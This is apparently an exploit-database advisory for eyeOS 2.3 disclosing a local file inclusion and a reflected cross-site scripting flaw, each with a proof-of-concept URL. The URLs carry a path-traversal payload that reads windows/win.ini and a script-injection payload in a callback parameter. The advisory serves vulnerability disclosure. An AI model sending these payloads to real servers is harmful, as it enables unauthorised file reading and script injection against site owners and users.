eyeos 2.3 - Multiple Vulnerabilities
Author: AutoSec Tools
type: webapps
platform: php
port:
date_added: 2011-04-06
date_updated: 2013-12-09
verified: 0
codes: CVE-2011-1715;CVE-2011-1714;OSVDB-71721;OSVDB-71720;OSVDB-71719;OSVDB-71718
tags:
aliases:
screenshot_url:
application_url:
------------------------------------------------------------------------
Software................eyeOS 2.3
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.eyeos.org/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in eyeOS 2.3 can be exploited to
include arbitrary files.
--PoC--
http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php?sleep=0&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
------------------------------------------------------------------------
Software................eyeOS 2.3
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.eyeos.org/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in eyeOS 2.3 can be
exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php?callback=%3Cscript%3Ealert%280%29%3C%2fscript%3E